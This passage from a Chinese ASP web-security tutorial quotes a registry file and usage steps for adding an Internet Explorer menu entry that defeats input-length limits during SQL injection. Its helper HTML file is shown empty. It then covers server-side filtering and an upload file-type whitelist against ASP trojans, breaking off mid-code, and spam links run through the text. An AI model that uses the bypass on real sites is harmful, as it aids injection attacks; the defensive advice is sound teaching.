<P style="TEXT-INDENT: 2em">　　本以为这样就万事大吉了，在表格页上加一些限制,比如maxlength啦,等等..但天公就是那么不作美,你越怕什么他越来什么.你别忘了,攻击者可 以突破sql注入攻击时输入框长度的限制.写一个SOCKET程序改变HTTP_REFERER？我不会。网上发表了这样一篇文章： </P>
<P style="TEXT-INDENT: 2em">　　------------len.reg-----------------&nbsp; </P>
<P style="TEXT-INDENT: 2em"><A href="http://www.123z.cn/">Windows</A>&nbsp;Registry&nbsp;Editor&nbsp;Version&nbsp;5.00&nbsp; </P>
<P style="TEXT-INDENT: 2em">[HKEY_CURRENT_USER\Software\Microsoft\Internet&nbsp;Explorer\MenuExt\扩展(&amp;E)]&nbsp; </P>
<P style="TEXT-INDENT: 2em">@="C:\Documents&nbsp;and&nbsp;Settings\Administrator\桌面\len.htm"&nbsp; </P>
<P style="TEXT-INDENT: 2em">"contexts"=dword:00000004&nbsp; </P>
<P style="TEXT-INDENT: 2em">-----------end----------------------&nbsp; </P>
<P style="TEXT-INDENT: 2em">-----------len.htm------------------&nbsp; </P>
<P style="TEXT-INDENT: 2em">　　----------end-----------------------&nbsp;</P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">　　</P>
<P style="TEXT-INDENT: 2em">　　用法:先把len.reg导入注册表(注意文件路径) </P>
<P style="TEXT-INDENT: 2em">　　然后把len.htm拷到注册表中指定的地方. </P>
<P style="TEXT-INDENT: 2em">　　打开<A href="http://www.123z.cn/">网页[www.123z.cn]</A>,光标放在要改变长度的输入框上点右键,看多了一个叫扩展的选项了吧 </P>
<P style="TEXT-INDENT: 2em">　　单击搞定! 后记:同样的也就可以对付那些限制输入内容的脚本了. </P>
<P style="TEXT-INDENT: 2em">　　怎么办？我们的限制被饶过了，所有的努力都白费了？不，举起你de键盘，说不。让我们继续回到脚本字符的过滤吧，他们所进行的注入无非就是进行脚本攻 击。我们把所有的精力全都用到ACTION以后的页面吧，在chk.asp页中，我们将非法的字符全部过滤掉，结果如何？我们只在前面虚晃一枪，叫他们去 改注册表吧，当他们改完才会发现，他们所做的都是那么的徒劳。 </P>
<P style="TEXT-INDENT: 2em">　　8、ASP木马</P>
<P style="TEXT-INDENT: 2em">　　已经讲到这里了，再提醒各位论 坛站长一句，小心你们的文件上传：为什么论坛程序被攻破后主机也随之被攻击者占据。原因就在……对！ASP木马！一个绝对可恶的东西。病毒么？非也.把个 文件随便放到你论坛的程序中，您老找去吧。不吐血才怪哦。如何才能防止ASP木马被上传到服务器呢？方法很简单，如果你的论坛支持文件上传，请设定好你要 上传的文件格式，我不赞成使用可更改的文件格式，直接从程序上锁定，只有图象文件格式，和压缩文件就完全可以，多给自己留点方便也就多给攻击者留点方便。 怎么判断格式，我这里收集了一个，也改出了一个，大家可以看一下： </P>
<P style="TEXT-INDENT: 2em">　　程序体(10) </P>
<P style="TEXT-INDENT: 2em">　　’判断文件类型是否合格&nbsp; </P>
<P style="TEXT-INDENT: 2em">Private&nbsp;Function&nbsp;CheckFileExt&nbsp;(fileEXT)&nbsp; </P>
<P style="TEXT-INDENT: 2em">dim&nbsp;Forumupload&nbsp; </P>
<P style="TEXT-INDENT: 2em">Forumupload="gif,jpg,bmp,jpeg"&nbsp; </P>
<P style="TEXT-INDENT: 2em">Forumupload=split(Forumupload,",")&nbsp; </P>
<P style="TEXT-INDENT: 2em">for&nbsp;i=0&nbsp;to&nbsp;ubound(Forumupload)&nbsp; </P>
<P style="TEXT-INDENT: 2em">if&nbsp;lcase(fileEXT)=lcase(trim(Forumupload(i)))&nbsp;then&nbsp; </P>
<P style="TEXT-INDENT: 2em">CheckFileExt=true&nbsp; </P>
<P style="TEXT-INDENT: 2em">exit&nbsp;Function&nbsp; </P>
<P style="TEXT-INDENT: 2em">else&nbsp; </P>
<P style="TEXT-INDENT: 2em">CheckFileExt=false&nbsp; </P>
<P style="TEXT-INDENT: 2em">end&nbsp;if&nbsp; </P>
<P style="TEXT-I